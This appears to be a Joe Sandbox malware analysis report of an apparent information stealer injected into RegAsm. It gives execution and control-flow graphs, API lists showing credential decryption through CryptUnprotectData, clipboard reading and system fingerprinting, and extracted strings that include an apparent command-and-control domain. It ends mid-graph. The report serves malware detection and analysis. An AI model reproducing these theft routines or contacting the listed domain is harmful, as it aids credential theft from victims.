                          execution_graph 11042 4192c3 11043 4192d0 11042->11043 11043->11043 11044 419477 CryptUnprotectData 11043->11044 11255 4228e0 11256 422930 11255->11256 11257 4228ee 11255->11257 11259 4229f0 11257->11259 11260 422a00 11259->11260 11260->11260 11261 440dc0 LdrInitializeThunk 11260->11261 11262 422b0f 11261->11262 11045 42d30b 11047 42d32a 11045->11047 11046 42d3db FreeLibrary 11048 42d3ed 11046->11048 11047->11046 11047->11047 11049 42d3fd GetComputerNameExA 11048->11049 11051 42d460 GetComputerNameExA 11049->11051 11052 42d530 11051->11052 11263 430969 CoSetProxyBlanket 11053 40d9cc 11054 40da00 11053->11054 11056 40da68 11054->11056 11118 43e420 LdrInitializeThunk 11054->11118 11069 4251d0 11056->11069 11058 40db1e 11084 425440 11058->11084 11060 40db3e 11101 4277c0 11060->11101 11064 40db70 11114 4297d0 11064->11114 11066 40db99 11119 433a50 11066->11119 11070 425280 11069->11070 11070->11070 11071 4253b1 11070->11071 11073 42541b 11070->11073 11074 4255e1 11070->11074 11134 441720 11070->11134 11128 420ef0 11071->11128 11073->11058 11144 441480 11074->11144 11079 441360 LdrInitializeThunk 11081 425646 11079->11081 11081->11073 11081->11079 11081->11081 11082 426290 11081->11082 11158 4419d0 11081->11158 11082->11073 11168 43e420 LdrInitializeThunk 11082->11168 11085 42544e 11084->11085 11086 441360 LdrInitializeThunk 11085->11086 11089 425374 11086->11089 11087 441720 3 API calls 11087->11089 11088 42541b 11088->11060 11089->11087 11089->11088 11090 4255e1 11089->11090 11091 4253b1 11089->11091 11092 441480 3 API calls 11090->11092 11093 420ef0 3 API calls 11091->11093 11094 425612 11092->11094 11093->11088 11095 441360 LdrInitializeThunk 11094->11095 11099 425646 11094->11099 11095->11099 11096 426290 11096->11088 11211 43e420 LdrInitializeThunk 11096->11211 11097 441360 LdrInitializeThunk 11097->11099 11098 4419d0 3 API calls 11098->11099 11099->11088 11099->11096 11099->11097 11099->11098 11102 4277f0 11101->11102 11104 42784e 11102->11104 11212 43e420 LdrInitializeThunk 11102->11212 11103 40db67 11111 427c90 11103->11111 11104->11103 11105 43bb20 RtlAllocateHeap 11104->11105 11108 427900 11105->11108 11107 43bb70 RtlFreeHeap 11107->11103 11110 42797e 11108->11110 11213 43e420 LdrInitializeThunk 11108->11213 11110->11107 11110->11110 11214 427cb0 11111->11214 11113 427c99 11113->11064 11115 429820 11114->11115 11115->11115 11116 429b83 11115->11116 11117 440c20 LdrInitializeThunk 11115->11117 11116->11066 11117->11115 11118->11056 11230 418880 11119->11230 11121 433a5e OpenClipboard 11122 40dbc2 11121->11122 11123 433a89 GetWindowLongW GetClipboardData 11121->11123 11124 433c08 CloseClipboard 11123->11124 11125 433abe GlobalLock 11123->11125 11124->11122 11127 433adb 11125->11127 11126 433bfa GlobalUnlock 11126->11124 11127->11126 11133 420f00 11128->11133 11129 420ff9 11129->11129 11130 420fd0 11129->11130 11173 422d10 11129->11173 11130->11073 11133->11129 11133->11130 11169 440dc0 11133->11169 11136 441750 11134->11136 11135 4417ae 11137 4419c2 11135->11137 11138 43bb20 RtlAllocateHeap 11135->11138 11136->11135 11204 43e420 LdrInitializeThunk 11136->11204 11137->11070 11141 4417ef 11138->11141 11140 43bb70 RtlFreeHeap 11140->11137 11143 44186e 11141->11143 11205 43e420 LdrInitializeThunk 11141->11205 11143->11140 11143->11143 11145 4414a0 11144->11145 11146 4414fe 11145->11146 11206 43e420 LdrInitializeThunk 11145->11206 11147 43bb20 RtlAllocateHeap 11146->11147 11151 425612 11146->11151 11149 441588 11147->11149 11153 44161e 11149->11153 11207 43e420 LdrInitializeThunk 11149->11207 11150 43bb70 RtlFreeHeap 11150->11151 11151->11081 11154 441360 11151->11154 11153->11150 11156 441380 11154->11156 11155 44144f 11155->11081 11156->11155 11208 43e420 LdrInitializeThunk 11156->11208 11161 441a00 11158->11161 11159 441a5e 11160 441ca2 11159->11160 11162 43bb20 RtlAllocateHeap 11159->11162 11160->11081 11161->11159 11209 43e420 LdrInitializeThunk 11161->11209 11165 441aa3 11162->11165 11164 43bb70 RtlFreeHeap 11164->11160 11167 441b2e 11165->11167 11210 43e420 LdrInitializeThunk 11165->11210 11167->11164 11168->11073 11170 440de0 11169->11170 11171 440f1e 11170->11171 11188 43e420 LdrInitializeThunk 11170->11188 11171->11129 11189 440c20 11173->11189 11175 423538 11175->11130 11176 422d53 11176->11175 11193 43bb20 11176->11193 11178 422d98 11183 422e25 11178->11183 11196 43e420 LdrInitializeThunk 11178->11196 11179 42349b 11181 43bb70 RtlFreeHeap 11179->11181 11184 4234a9 11181->11184 11182 43bb20 RtlAllocateHeap 11182->11183 11183->11179 11183->11182 11197 43e420 LdrInitializeThunk 11183->11197 11198 43bb70 11183->11198 11184->11175 11202 43e420 LdrInitializeThunk 11184->11202 11188->11171 11190 440c40 11189->11190 11190->11190 11191 440d6e 11190->11191 11203 43e420 LdrInitializeThunk 11190->11203 11191->11176 11194 43bb40 11193->11194 11194->11194 11195 43bb54 RtlAllocateHeap 11194->11195 11195->11178 11196->11178 11197->11183 11199 43bbd2 RtlFreeHeap 11198->11199 11200 43bbde 11198->11200 11201 43bb84 11198->11201 11199->11200 11200->11183 11201->11199 11202->11184 11203->11191 11204->11135 11205->11143 11206->11146 11207->11153 11208->11155 11209->11159 11210->11167 11211->11088 11212->11104 11213->11110 11215 427d10 11214->11215 11215->11215 11218 43bbf0 11215->11218 11219 43bc10 11218->11219 11221 43bc5e 11219->11221 11228 43e420 LdrInitializeThunk 11219->11228 11220 427d3d 11221->11220 11222 43bb20 RtlAllocateHeap 11221->11222 11225 43bcd5 11222->11225 11224 43bb70 RtlFreeHeap 11224->11220 11227 43bd3e 11225->11227 11229 43e420 LdrInitializeThunk 11225->11229 11227->11224 11228->11221 11229->11227 11230->11121 11264 40e4af CoUninitialize 11265 40e4d0 11264->11265 11265->11265 11266 408a70 11267 408a7f 11266->11267 11268 408a87 SHGetSpecialFolderPathW 11267->11268 11269 408c1a ExitProcess 11267->11269 11270 408a9d 11268->11270 11271 408c15 11270->11271 11272 408aa5 GetCurrentThreadId 11270->11272 11281 43e350 11271->11281 11274 408ac5 GetCurrentProcessId GetForegroundWindow 11272->11274 11276 408b70 11274->11276 11276->11271 11280 40cd40 CoInitializeEx 11276->11280 11284 43fdc0 11281->11284 11283 43e355 FreeLibrary 11283->11269 11285 43fdc9 11284->11285 11285->11283 11286 40cdb0 11287 40cdd0 11286->11287 11290 439250 11287->11290 11289 40ce12 11291 4392b0 CoCreateInstance 11290->11291 11293 439926 11291->11293 11294 43936b SysAllocString 11291->11294 11296 439936 GetVolumeInformationW 11293->11296 11297 439449 11294->11297 11302 43994d 11296->11302 11298 439912 SysFreeString 11297->11298 11299 439458 CoSetProxyBlanket 11297->11299 11298->11293 11300 439908 11299->11300 11301 439478 SysAllocString 11299->11301 11300->11298 11304 439550 11301->11304 11302->11289 11304->11304 11305 43957e SysAllocString 11304->11305 11307 4395a1 11305->11307 11306 4398ef SysFreeString SysFreeString 11306->11300 11307->11306 11308 4398e5 11307->11308 11309 4395e5 VariantInit 11307->11309 11308->11306 11311 439640 11309->11311 11310 4398d4 VariantClear 11310->11308 11311->11310 11231 438ed0 11233 438ef0 11231->11233 11232 4391d8 11235 438fee 11233->11235 11240 43e420 LdrInitializeThunk 11233->11240 11235->11232 11237 4390ee 11235->11237 11239 43e420 LdrInitializeThunk 11235->11239 11237->11232 11241 43e420 LdrInitializeThunk 11237->11241 11239->11237 11240->11235 11241->11232 11313 43e370 11314 43e3e3 11313->11314 11315 43e38b 11313->11315 11316 43e399 RtlReAllocateHeap 11313->11316 11317 43e3ee 11313->11317 11321 43e3e9 11313->11321 11318 43bb20 RtlAllocateHeap 11314->11318 11315->11316 11315->11317 11315->11321 11316->11321 11319 43bb70 RtlFreeHeap 11317->11319 11318->11321 11319->11321 11242 441050 11243 441080 11242->11243 11246 4410de 11243->11246 11248 43e420 LdrInitializeThunk 11243->11248 11244 44118e 11246->11244 11249 43e420 LdrInitializeThunk 11246->11249 11248->11246 11249->11244 11322 441cb0 11323 441cbf 11322->11323 11325 441d8e 11323->11325 11332 43e420 LdrInitializeThunk 11323->11332 11324 441f63 11325->11324 11326 43bb20 RtlAllocateHeap 11325->11326 11328 441df6 11326->11328 11331 441eae 11328->11331 11333 43e420 LdrInitializeThunk 11328->11333 11329 43bb70 RtlFreeHeap 11329->11324 11331->11329 11332->11325 11333->11331 11334 42eafb 11335 42eb30 11334->11335 11336 42ec3e 11335->11336 11338 43e420 LdrInitializeThunk 11335->11338 11338->11336 11339 42e3be 11340 42e38e FreeLibrary 11339->11340 11343 42e3c7 11339->11343 11342 42e7f9 11340->11342 11344 42e7d5 GetPhysicallyInstalledSystemMemory 11343->11344 11344->11342 11250 40d69e 11251 40d740 11250->11251 11251->11251 11252 40d7ae 11251->11252 11254 43e420 LdrInitializeThunk 11251->11254 11254->11252 11345 40cd7e CoInitializeSecurity

                          Executed Functions

                          Function 00439250 Relevance: 32.1, APIs: 11, Strings: 7, Instructions: 627memorycomCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 0 439250-4392a5 1 4392b0-4392ec 0->1 1->1 2 4392ee-43930a 1->2 4 439317-439365 CoCreateInstance 2->4 5 43930c 2->5 6 439926-43994b call 4402f0 GetVolumeInformationW 4->6 7 43936b-4393b3 4->7 5->4 12 439955-439957 6->12 13 43994d-439951 6->13 8 4393c0-439419 7->8 8->8 10 43941b-439452 SysAllocString 8->10 16 439912-439922 SysFreeString 10->16 17 439458-439472 CoSetProxyBlanket 10->17 15 43996f-439976 12->15 13->12 18 439978-43997f 15->18 19 43998f-4399da call 41fd50 15->19 16->6 22 439908-43990e 17->22 23 439478-439497 17->23 18->19 20 439981-43998d 18->20 26 4399e0-4399eb 19->26 20->19 22->16 25 4394a0-4394bb 23->25 25->25 27 4394bd-439541 SysAllocString 25->27 26->26 28 4399ed-4399f9 26->28 29 439550-43957c 27->29 30 439960-439969 28->30 31 4399ff-439a0f call 4084f0 28->31 29->29 32 43957e-4395a3 SysAllocString 29->32 30->15 34 439a14-439a1b 30->34 31->30 37 4395a9-4395cb 32->37 38 4398ef-439901 SysFreeString * 2 32->38 40 4395d1-4395d4 37->40 41 4398e5-4398eb 37->41 38->22 40->41 42 4395da-4395df 40->42 41->38 42->41 43 4395e5-43963f VariantInit 42->43 44 439640-439693 43->44 44->44 45 439695-4396ae 44->45 46 4396b2-4396b4 45->46 47 4398d4-4398e1 VariantClear 46->47 48 4396ba-4396c0 46->48 47->41 48->47 49 4396c6-4396d3 48->49 50 439713 49->50 51 4396d5-4396da 49->51 52 439715-43972d call 408440 50->52 53 4396ec-4396f0 51->53 62 439733-43973d 52->62 63 43986e-43988e 52->63 55 4396f2-4396fd 53->55 56 4396e0 53->56 59 439706-43970c 55->59 60 4396ff-439704 55->60 58 4396e1-4396ea 56->58 58->52 58->53 59->58 61 43970e-439711 59->61 60->58 61->58 62->63 64 439743-43974b 62->64 65 439890-4398a6 63->65 66 4398c7-4398d0 call 408450 63->66 67 439750-43975c 64->67 65->66 68 4398a8-4398be 65->68 66->47 70 439770-439776 67->70 71 43975e-439763 67->71 68->66 72 4398c0-4398c3 68->72 75 439795-4397a3 70->75 76 439778-43977b 70->76 74 439800-439812 71->74 72->66 77 439814-43981e 74->77 79 43982a-439833 75->79 80 4397a9-4397ac 75->80 76->75 78 43977d-439793 76->78 77->63 81 439820-439822 77->81 78->74 79->77 82 439835-439838 79->82 80->79 83 4397ae-4397f7 80->83 81->67 84 439828 81->84 85 43986a-43986c 82->85 86 43983a-439868 82->86 83->74 84->63 85->74 86->74
                          APIs
                          • CoCreateInstance.OLE32(00443678,00000000,00000001,00443668,00000000), ref: 0043935D
                          • SysAllocString.OLEAUT32(194B1B42), ref: 00439420
                          • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0043946A
                          • SysAllocString.OLEAUT32(194B1B42), ref: 004394BE
                          • SysAllocString.OLEAUT32(194B1B42), ref: 0043957F
                          • VariantInit.OLEAUT32(?), ref: 004395EA
                          • SysFreeString.OLEAUT32(?), ref: 00439916
                          • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,8F59896D,00000000,00000000,00000000,00000000), ref: 00439947
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: String$Alloc$BlanketCreateFreeInformationInitInstanceProxyVariantVolume
                          • String ID: 7o=m$89$C$Ig:e$\$hw$lc
                          • API String ID: 505850577-4291297616
                          • Opcode ID: 0d9db5b245d2ce6c81176f84728941803a693ae74ea654298c89b6ce03bbb13d
                          • Instruction ID: 4875b3428042338d19e7170f3aaea273ecd47b7a9897bebdcd795001d034bec3
                          • Opcode Fuzzy Hash: 0d9db5b245d2ce6c81176f84728941803a693ae74ea654298c89b6ce03bbb13d
                          • Instruction Fuzzy Hash: 10223276A183019FE314CF28C89176BBBE1EFCA314F14892DE5959B391D7B8D805CB86
                          Function 00422D10 Relevance: 16.8, Strings: 13, Instructions: 584COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 95 422d10-422d58 call 440c20 98 422d5e-422dc3 call 418860 call 43bb20 95->98 99 42358d-42359d 95->99 104 422dc5-422dc8 98->104 105 422e12-422e16 104->105 106 422dca-422e10 104->106 107 422e18-422e23 105->107 106->104 108 422e25 107->108 109 422e2a-422e3d 107->109 110 422ee7-422eea 108->110 111 422e44-422e4a 109->111 112 422e3f-422ed6 109->112 113 422eee-422ef3 110->113 114 422eec 110->114 116 422e56-422ec6 call 43e420 111->116 117 422e4c-422e51 111->117 118 422ed8-422edb 112->118 119 422ef9-422f07 113->119 120 42349f-4234d9 call 43bb70 113->120 114->113 126 422ecb-422ed4 116->126 117->118 123 422edf-422ee2 118->123 124 422edd 118->124 125 422f09-422f29 119->125 130 4234db-4234de 120->130 123->107 124->110 128 422f2f-422f4e 125->128 129 42318c-42318f 125->129 126->118 133 422f53-422f5e 128->133 131 423191-423195 129->131 132 423197-4231a8 call 43bb20 129->132 134 4234e0-423526 130->134 135 423528-42352e 130->135 136 4231be-4231c0 131->136 146 4231ba-4231bc 132->146 147 4231aa-4231b5 132->147 133->133 138 422f60-422f64 133->138 134->130 139 423530-423536 135->139 142 4231c6-4231e5 136->142 143 423478-42347d 136->143 141 422f66-422f69 138->141 144 42353a-42354c 139->144 145 423538 139->145 150 422fa4-422fcd call 4235a0 141->150 151 422f6b-422fa2 141->151 152 4231ea-4231f5 142->152 148 423489-42348d 143->148 149 42347f-423487 143->149 153 423550-423556 144->153 154 42354e 144->154 145->99 146->136 155 423491-423495 147->155 156 42348f 148->156 149->156 150->129 164 422fd3-423015 150->164 151->141 152->152 158 4231f7-4231fb 152->158 159 42357d-423580 153->159 160 423558-423578 call 43e420 153->160 154->159 155->125 161 42349b-42349d 155->161 156->155 163 4231fd-423200 158->163 168 423582-423584 159->168 169 423586-42358b 159->169 160->159 161->120 165 423202-42322a 163->165 166 42322c-42326b 163->166 171 42301a-423028 164->171 165->163 172 42326d-423270 166->172 168->99 169->139 171->171 173 42302a 171->173 174 423272-4232b8 172->174 175 4232ba-4232c0 172->175 176 42302c-42302f 173->176 174->172 177 4232c2-4232cd 175->177 178 4230b6-4230e7 call 4235a0 176->178 179 423035-4230b1 176->179 180 4232d4-4232e7 177->180 181 4232cf 177->181 193 4230e9 178->193 194 4230ee-423105 178->194 179->176 184 4232e9-42338a 180->184 185 4232ee-4232f4 180->185 183 42339b-4233a0 181->183 186 4233a2 183->186 187 4233a4-4233c7 183->187 195 42338c-42338f 184->195 190 423300-42337a call 43e420 185->190 191 4232f6-4232fb 185->191 186->187 192 4233cc-4233d7 187->192 202 42337f-423388 190->202 191->195 192->192 199 4233d9 192->199 193->129 200 423107 194->200 201 423109-42318a call 408440 call 4184c0 call 408450 194->201 197 423393-423396 195->197 198 423391 195->198 197->177 198->183 203 4233db-4233de 199->203 200->201 201->129 202->195 205 4233e0-423409 203->205 206 42340b-423411 203->206 205->203 208 423413-423417 206->208 209 423449-42344c 206->209 213 423419-423420 208->213 211 423461-423467 209->211 212 42344e-42345f call 43bb70 209->212 216 423469-42346c 211->216 212->216 217 423422-42342e 213->217 218 423430-423439 213->218 216->143 221 42346e-423476 216->221 217->213 222 42343b 218->222 223 42343d-423443 218->223 221->155 224 423445-423447 222->224 223->224 224->209
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: AllocateHeapInitializeThunk
                          • String ID: !@$($)$*$+$+$,$/$/$1$2$3$f
                          • API String ID: 383220839-3341998751
                          • Opcode ID: 0e7c90368221c0814dd1a174816d4e6c61afc9ccdfb36f4a8009d3125df19c50
                          • Instruction ID: 18a18858be2276d736ea764ddcbb21285169e24f3d603c0614fa0cb3e178f1e1
                          • Opcode Fuzzy Hash: 0e7c90368221c0814dd1a174816d4e6c61afc9ccdfb36f4a8009d3125df19c50
                          • Instruction Fuzzy Hash: 7532D03160C3908FD325DF28D48036EBBE1AB85314F588A6EE5D587392D7BD8945CB4B
                          Function 0042E3BE Relevance: 9.4, APIs: 2, Strings: 3, Instructions: 669COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 227 42e3be-42e3c5 228 42e3c7-42e3cd 227->228 229 42e38e-42e394 227->229 232 42e435-42e43f 228->232 233 42e3cf-42e3df 228->233 230 42e396-42e397 229->230 231 42e3ab-42e3b7 FreeLibrary 229->231 234 42e3a0-42e3a9 230->234 236 42f1c3-42f1f9 231->236 235 42e440-42e449 232->235 240 42e3e0-42e425 233->240 234->231 234->234 235->235 238 42e44b-42e457 235->238 239 42f200-42f227 236->239 241 42e471-42e4cf call 4402f0 call 408290 call 41fd50 238->241 242 42e459-42e45b 238->242 239->239 243 42f229-42f251 call 409130 239->243 240->240 244 42e427-42e432 240->244 257 42e4d0-42e4ea 241->257 246 42e460-42e46d 242->246 244->238 245 42e434 244->245 245->232 246->246 249 42e46f 246->249 249->241 257->257 258 42e4ec-42e52b 257->258 259 42e530-42e550 258->259 259->259 260 42e552-42e55b 259->260 261 42e57d 260->261 262 42e55d-42e566 260->262 264 42e580-42e588 261->264 263 42e570-42e579 262->263 263->263 265 42e57b 263->265 266 42e58a-42e58b 264->266 267 42e59b-42e5a7 264->267 265->264 268 42e590-42e599 266->268 269 42e5bb-42e603 267->269 270 42e5a9-42e5af 267->270 268->267 268->268 272 42e610-42e63e 269->272 271 42e5b0-42e5b9 270->271 271->269 271->271 272->272 273 42e640-42e649 272->273 274 42e64b-42e654 273->274 275 42e66d 273->275 276 42e660-42e669 274->276 277 42e670-42e679 275->277 276->276 278 42e66b 276->278 279 42e68b-42e715 277->279 280 42e67b-42e67f 277->280 278->277 282 42e720-42e765 279->282 281 42e680-42e689 280->281 281->279 281->281 282->282 283 42e767-42e775 282->283 284 42e777-42e77f 283->284 285 42e78b-42e797 283->285 286 42e780-42e789 284->286 287 42e7b1-42e7f4 call 4402f0 GetPhysicallyInstalledSystemMemory call 41fd50 285->287 288 42e799-42e79b 285->288 286->285 286->286 294 42e7f9-42e808 287->294 290 42e7a0-42e7ad 288->290 290->290 291 42e7af 290->291 291->287 295 42e810-42e82a 294->295 295->295 296 42e82c-42e86b 295->296 297 42e870-42e890 296->297 297->297 298 42e892-42e89b 297->298 299 42e8bd 298->299 300 42e89d-42e8a6 298->300 302 42e8c0-42e8c8 299->302 301 42e8b0-42e8b9 300->301 301->301 303 42e8bb 301->303 304 42e8ca-42e8cb 302->304 305 42e8db-42e8e7 302->305 303->302 306 42e8d0-42e8d9 304->306 307 42e8fb-42e943 305->307 308 42e8e9-42e8ef 305->308 306->305 306->306 310 42e950-42e97e 307->310 309 42e8f0-42e8f9 308->309 309->307 309->309 310->310 311 42e980-42e989 310->311 312 42e98b-42e994 311->312 313 42e9ad 311->313 314 42e9a0-42e9a9 312->314 315 42e9b0-42e9b9 313->315 314->314 316 42e9ab 314->316 317 42e9cb-42ea50 315->317 318 42e9bb-42e9bf 315->318 316->315 317->236 319 42e9c0-42e9c9 318->319 319->317 319->319
                          APIs
                          • FreeLibrary.KERNEL32(?), ref: 0042E3B1
                          • GetPhysicallyInstalledSystemMemory.KERNELBASE(00000000), ref: 0042E7DC
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: FreeInstalledLibraryMemoryPhysicallySystem
                          • String ID: *XJl$YwS9$xtNw
                          • API String ID: 2745378098-2076723864
                          • Opcode ID: 11e01c268bc6cc07dac0ff966c06403923485280336a2349d59ef7a7537905d3
                          • Instruction ID: 0cb95c5ddde5167c2878493bc37a8644eb6a7979be790ba108b356da41a9ce9e
                          • Opcode Fuzzy Hash: 11e01c268bc6cc07dac0ff966c06403923485280336a2349d59ef7a7537905d3
                          • Instruction Fuzzy Hash: FD220970608B918FD729CF3694607A3BBE2AF57304F58886EC0DB87792D739A406CB55
                          Function 0040CDB0 Relevance: 7.7, Strings: 6, Instructions: 249COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 320 40cdb0-40cdc5 321 40cdd0-40cdf4 320->321 321->321 322 40cdf6-40ce2e call 408a00 call 439250 321->322 327 40ce30-40ce4a 322->327 327->327 328 40ce4c-40cebf 327->328 329 40cec0-40cee1 328->329 329->329 330 40cee3-40cef4 329->330 331 40cef6-40ceff 330->331 332 40cf0b-40cf13 330->332 335 40cf00-40cf09 331->335 333 40cf15-40cf16 332->333 334 40cf2b-40cf38 332->334 336 40cf20-40cf29 333->336 337 40cf3a-40cf41 334->337 338 40cf5b-40cf63 334->338 335->332 335->335 336->334 336->336 339 40cf50-40cf59 337->339 340 40cf65-40cf66 338->340 341 40cf7b-40d09f 338->341 339->338 339->339 342 40cf70-40cf79 340->342 343 40d0a0-40d0f0 341->343 342->341 342->342 343->343 344 40d0f2-40d11f 343->344 345 40d120-40d138 344->345 345->345 346 40d13a-40d16b call 40bb10 345->346 348 40d170-40d18a 346->348
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: 1BE*$5697ED7B3A758717FEE815EB403F5D54$T1S7$\W$sector-essay.cyou$xr
                          • API String ID: 0-1795187820
                          • Opcode ID: 17b1c972bd5d4324f82aae2a25e503d7fc9efe7fc73f3fb4394cad4a3cfe7439
                          • Instruction ID: 7f445f716dfeb872be7e3e2942958d1a2f027dffcd5dd8ff26c4465676a265c2
                          • Opcode Fuzzy Hash: 17b1c972bd5d4324f82aae2a25e503d7fc9efe7fc73f3fb4394cad4a3cfe7439
                          • Instruction Fuzzy Hash: 0A91BDB154D3D18FD331CF29D4907EBBBE1AB96304F14896DD0DA5B382DA39480A8B97
                          Function 0040E4AF Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 244COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 349 40e4af-40e4c7 CoUninitialize 350 40e4d0-40e518 349->350 350->350 351 40e51a-40e541 350->351 352 40e550-40e572 351->352 352->352 353 40e574-40e5df 352->353 354 40e5e0-40e65b 353->354 354->354 355 40e65d-40e66e 354->355 356 40e670-40e67f 355->356 357 40e68b-40e69a 355->357 358 40e680-40e689 356->358 359 40e69c-40e6a1 357->359 360 40e6bd 357->360 358->357 358->358 361 40e6b0-40e6b9 359->361 362 40e6c1-40e6cb 360->362 361->361 363 40e6bb 361->363 364 40e6eb-40e6f3 362->364 365 40e6cd-40e6d1 362->365 363->362 367 40e6f5-40e6f6 364->367 368 40e70b-40e715 364->368 366 40e6e0-40e6e9 365->366 366->364 366->366 369 40e700-40e709 367->369 370 40e717-40e71b 368->370 371 40e72b-40e737 368->371 369->368 369->369 372 40e720-40e729 370->372 373 40e751 371->373 374 40e739-40e73b 371->374 372->371 372->372 375 40e740-40e74d 374->375 375->375 376 40e74f 375->376 376->373
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: Uninitialize
                          • String ID: %>?$7(6 $=$10$T|2
                          • API String ID: 3861434553-3970780521
                          • Opcode ID: 850fe3248efb4ac56c1d4687eb20485ed2fcb756a54de3d014a812383dd949de
                          • Instruction ID: 92f2906561030d20e4974ae0f3e2c5ce2d8a325bbd40e4d19a7462f81e4708f7
                          • Opcode Fuzzy Hash: 850fe3248efb4ac56c1d4687eb20485ed2fcb756a54de3d014a812383dd949de
                          • Instruction Fuzzy Hash: D651167550C3D28AD3258B26D4507ABBFE2AFA3300F5C8C6ED4C9A7382D77988098756
                          Function 00408A70 Relevance: 7.6, APIs: 5, Instructions: 137threadCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 377 408a70-408a81 call 43cf40 380 408a87-408a9f SHGetSpecialFolderPathW call 435d50 377->380 381 408c1a-408c1c ExitProcess 377->381 384 408c15 call 43e350 380->384 385 408aa5-408ac3 GetCurrentThreadId 380->385 384->381 387 408ac5 385->387 388 408ac7-408ad2 385->388 387->388 389 408ad4 388->389 390 408ad6-408ae5 388->390 389->390 391 408ae7 390->391 392 408ae9-408af4 390->392 391->392 393 408af6 392->393 394 408af8-408b6a GetCurrentProcessId GetForegroundWindow 392->394 393->394 395 408b70-408be7 394->395 396 408bf1-408c09 call 409e00 394->396 397 408be9-408beb 395->397 398 408bed-408bef 395->398 396->384 401 408c0b call 40cd40 396->401 397->398 398->396 403 408c10 call 40bae0 401->403 403->384
                          APIs
                          • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00408A92
                          • GetCurrentThreadId.KERNEL32 ref: 00408AA5
                          • GetCurrentProcessId.KERNEL32 ref: 00408AF8
                          • GetForegroundWindow.USER32 ref: 00408B62
                            • Part of subcall function 0040CD40: CoInitializeEx.COMBASE(00000000,00000002), ref: 0040CD53
                            • Part of subcall function 0040BAE0: FreeLibrary.KERNEL32(00408C15), ref: 0040BAE6
                            • Part of subcall function 0040BAE0: FreeLibrary.KERNEL32 ref: 0040BB07
                          • ExitProcess.KERNEL32 ref: 00408C1C
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: CurrentFreeLibraryProcess$ExitFolderForegroundInitializePathSpecialThreadWindow
                          • String ID:
                          • API String ID: 3072701918-0
                          • Opcode ID: b6c3b0a77390ba7a6dfcba04f710edca301b5b945b6146972dba92d56e1b716d
                          • Instruction ID: d3a72b71d84b3b02ec3761c03409b60bdcfe6a7a07409fb054609b6c9cc15e35
                          • Opcode Fuzzy Hash: b6c3b0a77390ba7a6dfcba04f710edca301b5b945b6146972dba92d56e1b716d
                          • Instruction Fuzzy Hash: 6B412777F407190BD7286AA9DD8A366B5964BC4711F0A413EAA84EB3D2FDFC8C0446C8
                          Function 0042D304 Relevance: 3.4, APIs: 2, Instructions: 421COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 486 42d304-42d3f8 call 4402f0 489 42d3fd-42d454 GetComputerNameExA 486->489 490 42d460-42d479 489->490 490->490 491 42d47b-42d484 490->491 492 42d486-42d48f 491->492 493 42d49d 491->493 494 42d490-42d499 492->494 495 42d4a0-42d4ac 493->495 494->494 498 42d49b 494->498 496 42d4cb-42d52b GetComputerNameExA 495->496 497 42d4ae-42d4b4 495->497 500 42d530-42d54a 496->500 499 42d4c0-42d4c9 497->499 498->495 499->496 499->499 500->500 501 42d54c-42d555 500->501 502 42d557-42d55f 501->502 503 42d56b-42d577 501->503 504 42d560-42d569 502->504 505 42d58b-42d5e5 503->505 506 42d579-42d57f 503->506 504->503 504->504 509 42d5f0-42d614 505->509 507 42d580-42d589 506->507 507->505 507->507 509->509 510 42d616-42d61f 509->510 511 42d621-42d627 510->511 512 42d63b-42d647 510->512 513 42d630-42d639 511->513 514 42d65b-42d6af call 4402f0 512->514 515 42d649-42d64f 512->515 513->512 513->513 520 42d6b0-42d6da 514->520 516 42d650-42d659 515->516 516->514 516->516 520->520 521 42d6dc-42d6e5 520->521 522 42d6e7-42d6ef 521->522 523 42d6fb-42d710 521->523 524 42d6f0-42d6f9 522->524 525 42d716-42d71f 523->525 526 42d854-42d89a 523->526 524->523 524->524 528 42d720-42d732 525->528 527 42d8a0-42d8ba 526->527 527->527 531 42d8bc-42d8c7 527->531 529 42d750-42d75b 528->529 530 42d734-42d741 528->530 533 42d780-42d78f 